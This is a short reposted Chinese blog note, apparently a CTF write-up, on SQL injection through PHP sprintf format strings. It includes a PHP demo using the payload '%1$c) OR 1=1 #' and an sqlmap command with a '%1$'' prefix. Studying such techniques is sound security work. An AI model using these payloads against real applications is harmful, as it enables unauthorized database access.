碼上快樂

相關內容    簡體    繁體

php sprintf格式化注入

本文轉載自   查看原文   2018-07-26 20:58   768    05、{ sql inject/ 03、{ php

URL:http://efa4e2c2b8df4ce69454639f4e3727071652c31167f341a4.game.ichunqiu.com/

簡單的說就是sprintf中%1$\'會將\吃掉,導致'的逃逸。%后表示第幾個參數,$表示參數類型。

還有一個sprintf漏洞的利用方式:%c起到了類似chr()的效果,將數字39轉化為',從而導致了sql注入。

1 <?php
2  
3 $input1 = '%1$c) OR 1=1 #';
4 $input2 = 39;
5 $sql = "SELECT * FROM foo WHERE bar IN ('$input1') AND baz = %s";
6 $sql = sprintf($sql, $input2);
7 echo $sql;
8 ?>

在這題中,--prefix加個前綴丟進sqlmap跑就好了。

雖然是post

  sqlmap -r /home/1.txt -p username --prefix="%1$'"

--prefix 前綴

--suffix 后綴

其實也可以直接*


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 sprintf格式化INT64 php sprintf() 函數把格式化的字符串寫入一個變量中。 sprintf() 格式化字符串函數 Go語言fmt.Sprintf(格式化輸出) [轉][修]sprintf()函數:將格式化的數據寫入字符串 Qt sprintf_s函數格式化字符串出錯 php json格式化輸出 sublime text怎么格式化PHP代碼 PHP日期格式化函數 sublime安裝php_beautifier來格式化PHP代碼
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM